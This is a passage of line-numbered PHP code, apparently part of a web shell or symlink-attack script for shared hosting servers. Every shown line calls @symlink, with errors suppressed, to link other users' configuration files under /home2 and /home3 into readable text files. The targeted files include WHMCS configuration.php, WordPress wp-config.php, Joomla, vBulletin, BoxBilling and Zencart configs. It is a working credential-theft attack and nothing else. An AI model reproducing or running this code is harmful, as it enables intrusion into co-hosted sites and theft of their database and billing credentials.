1697. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1698. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1699. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1700. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1701. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1702. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1703. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1704. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1705. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1706. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1707. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1708. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1709. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1710. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1711. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1712. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1713. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1714. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1715. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1716. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1717. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1718. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1719. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1720. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1721. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1722. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1723. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1724. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1725. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1726. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1727. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1728. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1729. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1730. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1731. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1732. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1733. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1734. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1735. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1736. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1737. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1738. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1739. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1740. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1741. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1742. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1743. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1744. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1745. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1746. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1747. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1748. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1749. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1750. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1751. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1752. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1753. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1754. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1755. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1756. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1757. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1758. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1759. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1760. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1761. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1762. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1763. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1764. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1765. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1766. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1767. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1768. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1769. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1770. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1771. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1772. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1773. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1774. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1775. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1776. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1777. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1778. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1779. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1780. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1781. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1782. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1783. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1784. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1785. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1786. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1787. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1788. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1789. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1790. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1791. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1792. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1793. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1794. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1795. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1796. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1797. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1798. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1799. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1800. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1801. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1802. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1803. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1804. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1805. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1806. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1807. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1808. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1809. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1810. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1811. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1812. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1813. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1814. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1815. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1816. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1817. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1818. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1819. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1820. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1821. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1822. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1823. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1824. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1825. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1826. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1827. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1828.  
1829. //Home3
1830.  
1831. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1832. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1833. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1834. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1835. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1836. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1837. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1838. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1839. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1840. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1841. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1842. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1843. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1844. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1845. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1846. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1847. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1848. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1849. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1850. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1851. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1852. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1853. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1854. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1855. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1856. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1857. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1858. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1859. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1860. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1861. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1862. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1863. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1864. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1865. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1866. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1867. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1868. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1869. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1870. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1871. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1872. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1873. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1874. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1875. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1876. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1877. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1878. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1879. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1880. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1881. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1882. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1883. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1884. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1885. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1886. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1887. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1888. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1889. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1890. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1891. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1892. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1893. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1894. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1895. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1896. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1897. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1898. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1899. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1900. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1901. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1902. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1903. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1904. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1905. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1906. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1907. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1908. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1909. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1910. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1911. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1912. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1913. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1914. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1915. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1916. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1917. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1918. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1919. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1920. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1921. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1922. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1923. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1924. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1925. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1926. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1927. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1928. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1929. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1930. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1931. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1932. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1933. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1934. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1935. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1936. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1937. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1938. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1939. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1940. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1941. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1942. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1943. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1944. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1945. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1946. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1947. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1948. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1949. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1950. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1951. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1952. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1953. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1954. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1955. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1956. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1957. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1958. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1959. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1960. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1961. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1962. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1963. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1964. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1965. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1966. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1967. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1968. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1969. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1970. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1971. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1972. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1973. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1974. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1975. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1976. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1977. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1978. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1979. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1980. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1981. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1982. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1983. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1984. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1985. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1986. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1987. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1988. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1989. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1990. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1991. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1992. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1993. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1994. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1995. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1996. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1997. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1998. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1999. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
2000. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
2001. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
2002. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
2003. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
2004. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
2005. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
2006. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
2007. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
